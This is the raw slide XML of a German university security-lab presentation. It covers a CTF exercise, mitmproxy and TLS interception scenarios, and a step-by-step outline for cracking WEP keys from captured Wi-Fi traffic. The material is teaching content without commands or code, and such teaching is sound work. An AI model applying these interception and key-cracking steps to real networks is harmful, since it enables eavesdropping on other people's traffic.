            <a:off x="6041524" y="3462130"/>
            <a:ext cx="1306205" cy="2318513"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 117501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5" name="Line 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="2"/>
            <a:endCxn id="57" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6417058" y="4654041"/>
            <a:ext cx="293896" cy="52248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56" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302765" y="5552057"/>
            <a:ext cx="1044964" cy="457172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Ermittelte </a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1633">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Flag</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6302765" y="5062230"/>
            <a:ext cx="1044964" cy="457172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38" tIns="40819" rIns="81638" bIns="40819" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1633">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ermittelte </a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1633">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Flag</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35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sz="2400" dirty="0"/>
              <a:t>ICTF</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Untertitel 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295200" y="745067"/>
            <a:ext cx="7315200" cy="34205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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="0" i="1" dirty="0" err="1"/>
              <a:t>Folkswagen_Emissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="0" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" b="0" i="1" dirty="0" err="1"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" b="0" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12814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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457172" y="1865376"/>
            <a:ext cx="8228763" cy="4654296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b="1" kern="0" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" lvl="1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2000" b="1" kern="0" baseline="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4"/>
              </a:buBlip>
              <a:defRPr sz="1400" kern="0" baseline="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smtClean="0"/>
              <a:t>Alternative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Tools die ein solches Feature (neben anderen Zusatzfunktionen) anbieten: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Suite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>SSLSplit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, usw.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Grundsätzliche </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Verfahren sicher</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Zertifikatsinfrastruktur hat aber Schwächen</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Beispielszenarien:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Zertifikatsstelle/Zertifikatsvergabe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>kompromittiert</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Besitz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>des Server-Key wurde erlangt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Zugriff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>auf den Opfer-PC → lokal Vertrauen gegenüber neuen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Zertifikaten </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>aussprechen</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Analyse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>des Https-Datenverkehr fremder Anwendungen</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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sz="2400" dirty="0"/>
              <a:t>Grundlagen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Untertitel 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295200" y="745067"/>
            <a:ext cx="7315200" cy="34205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600" b="0" i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kern="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Zertifikate Basics / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>mitmproxy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1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de-DE"/>
            </a:defPPr>
            <a:lvl1pPr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b="1" kern="0" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" lvl="1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2000" b="1" kern="0" baseline="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kern="0" baseline="0">
                <a:latin typeface="Arial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kern="0" baseline="0">
                <a:latin typeface="Arial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400" kern="0" baseline="0">
                <a:latin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Arbeitsweise von </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>mitmproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: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62" name="Bild 61"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580038" y="2416839"/>
            <a:ext cx="3983924" cy="2340719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351169" y="4622692"/>
            <a:ext cx="2416479" cy="210626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="81638" tIns="40819" rIns="81638" bIns="40819"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="907">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://mitmproxy.org/doc/howmitmproxy.html</a:t>
            </a:r>
            <a:endParaRPr sz="1633"/>
          </a:p>
        </p:txBody>
      </p:sp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de-DE" sz="2400" dirty="0" err="1"/>
              <a:t>mitmproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2400" dirty="0"/>
              <a:t> Übung</a:t>
            </a:r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295200" y="745067"/>
            <a:ext cx="7315200" cy="34205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600" b="0" i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kern="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8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619" y="2898012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991">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Live-Demo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1026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WEP ist nach heutigem Stand veraltet und gilt als unsicher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Seit 2013 dürfen durch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>die  Wi-Fi Alliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>zertifizierte Access Points kein 	WEP mehr anbieten</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Unterstützung verschiedener Authentifizierungsmethoden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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/>
              <a:t>Key Authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ansatzmöglichkeiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Datenverkehr auf dem Access Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Kaum Datenverkehr auf dem Access Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriff auf den Client</a:t>
            </a:r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2225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5200" y="764690"/>
            <a:ext cx="7315200" cy="32760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WEP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Ablauf eines Angriffs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Identifizieren des anzugreifenden Access Points </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Versetzen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>des WLAN Interfaces in den Monitoring Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Aufzeichnen des Datenverkehrs zwischen Client und Access Point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Optional: generieren von zusätzlichem Datenverkehr durch den Angreifer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„Offline“ errechnen des Schlüssels aus dem aufgezeichneten Datenverkehr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pPr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02734" y="37534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i="1" dirty="0" smtClean="0"/>
              <a:t>Die Demos</a:t>
            </a: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8C7-EEA1-D54F-B803-ED3280BF054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64450" y="6582676"/>
            <a:ext cx="1532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Josef König, Christian Paulus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959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2707</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Bildschirmpräsentation (4:3)</PresentationFormat>
  <Paragraphs>890</Paragraphs>
  <Slides>76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7" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier-Bold</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>thi_template_thi_2</vt:lpstr>
      <vt:lpstr>Bildschirm</vt:lpstr>
      <vt:lpstr>Hörsaal</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Abschlusspräsentation</vt:lpstr>
      <vt:lpstr>Abschlusspräsentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr> - Was hatten wir geplant -</vt:lpstr>
      <vt:lpstr>Umsetzung</vt:lpstr>
      <vt:lpstr>Hardware und Aufbau</vt:lpstr>
      <vt:lpstr>Dokumentation &amp; HTML Anweisungen</vt:lpstr>
      <vt:lpstr>WEP</vt:lpstr>
      <vt:lpstr>WEP</vt:lpstr>
      <vt:lpstr>WEP</vt:lpstr>
      <vt:lpstr>DoS</vt:lpstr>
      <vt:lpstr>Fake-AP</vt:lpstr>
      <vt:lpstr>WPA/WPA2</vt:lpstr>
      <vt:lpstr>WPA/WPA2</vt:lpstr>
      <vt:lpstr>WPA/WPA2</vt:lpstr>
      <vt:lpstr>WPS</vt:lpstr>
      <vt:lpstr>- was gibt es noch zu tun? - </vt:lpstr>
      <vt:lpstr>Abschlusspräsentation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Security-Workbench</vt:lpstr>
      <vt:lpstr>Abschlusspräsentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Inhalt</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>SecurityWorkBench</vt:lpstr>
      <vt:lpstr>Demonstration</vt:lpstr>
      <vt:lpstr>Demonstration</vt:lpstr>
      <vt:lpstr>Demonstration</vt:lpstr>
      <vt:lpstr>Demonstration</vt:lpstr>
      <vt:lpstr>Demonstration</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Inhalt</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>ICTF - Marketing</vt:lpstr>
      <vt:lpstr>ICTF - Benign</vt:lpstr>
      <vt:lpstr>ICTF – Etherpad- und Fileshareserver</vt:lpstr>
      <vt:lpstr>Nmap Tutorial</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>XSS – Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS – Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS – Cross Site Scripting</vt:lpstr>
      <vt:lpstr>XSS – Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>iCTF</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>ICTF</vt:lpstr>
      <vt:lpstr>Grundlagen</vt:lpstr>
      <vt:lpstr>mitmproxy Übung</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation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phw4497@thi.de</cp:lastModifiedBy>
  <cp:revision>138</cp:revision>
  <cp:lastPrinted>2013-09-13T13:09:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-06-10T06:20:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-11T12:53:20Z</dcterms:modified>
</cp:coreProperties>
</file>